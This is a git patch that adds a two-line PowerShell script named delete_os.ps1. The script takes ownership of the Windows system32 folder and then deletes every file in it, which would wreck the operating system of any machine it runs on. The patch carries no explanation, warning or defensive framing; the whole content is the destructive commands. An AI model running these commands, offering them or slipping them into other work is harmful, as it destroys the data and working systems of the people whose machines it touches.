From 4c985f15a7b08981b9ca25b51bd284bcc9647eb5 Mon Sep 17 00:00:00 2001 From: RomanNum3ral Date: Sun, 6 Jul 2025 18:08:57 +0000 Subject: [PATCH] Add delete_os.ps1 --- delete_os.ps1 | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 delete_os.ps1 diff --git a/delete_os.ps1 b/delete_os.ps1 new file mode 100644 index 0000000..2850609 --- /dev/null +++ b/delete_os.ps1 @@ -0,0 +1,2 @@ +takeown /f C:/Windows/system32 +del C:/Windows/system32/* \ No newline at end of file